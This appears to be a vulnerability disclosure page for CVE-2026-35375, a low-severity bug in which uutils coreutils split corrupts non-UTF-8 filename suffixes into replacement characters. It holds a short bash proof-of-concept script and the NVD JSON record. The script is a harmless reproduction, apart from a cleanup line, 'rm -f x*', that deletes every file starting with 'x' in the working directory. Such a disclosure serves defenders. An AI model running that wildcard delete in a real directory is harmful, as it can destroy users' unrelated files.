CVE-2026-35375

#!/bin/bash # PoC for CVE-2026-35375: uutils coreutils split filename corruption # This script demonstrates the filename collision issue using non-UTF-8 bytes. echo "[+] Creating dummy input file..." echo "Hello World" > input_data.txt echo "[+] Attempting to split with non-UTF-8 suffix (byte 0xFF)..." # In a vulnerable version of uutils split, this might replace 0xFF with � # potentially causing collisions if other invalid bytes map to the same replacement. # Note: Actual reproduction depends on the shell and locale settings. # Create a suffix with raw hex byte 0xFF SUFFIX=$(printf "\xff") # Run split (assuming 'split' is the uutils version) split -b 1 input_data.txt --additional-suffix="$SUFFIX" echo "[+] Listing generated files:" ls -l | grep "x" echo "[!] If filenames contain replacement characters (�) instead of raw bytes, the vulnerability is present." # Cleanup rm -f x* input_data.txt

{"cve": {"id": "CVE-2026-35375", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:42.293", "lastModified": "2026-05-04T19:13:37.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logic error in the split utility of uutils coreutils causes the corruption of output filenames when provided with non-UTF-8 prefix or suffix inputs. The implementation utilizes to_string_lossy() when constructing chunk filenames, which automatically rewrites invalid byte sequences into the UTF-8 replacement character (U+FFFD). This behavior diverges from GNU split, which preserves raw pathname bytes intact. In environments utilizing non-UTF-8 encodings, this vulnerability leads to the creation of files with incorrect names, potentially causing filename collisions, broken automation, or the misdirection of output data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-176"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.8.0", "matchCriteriaId": "2365DBBD-6F10-4651-8DA4-08AE79E14423"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/11397", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.8.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}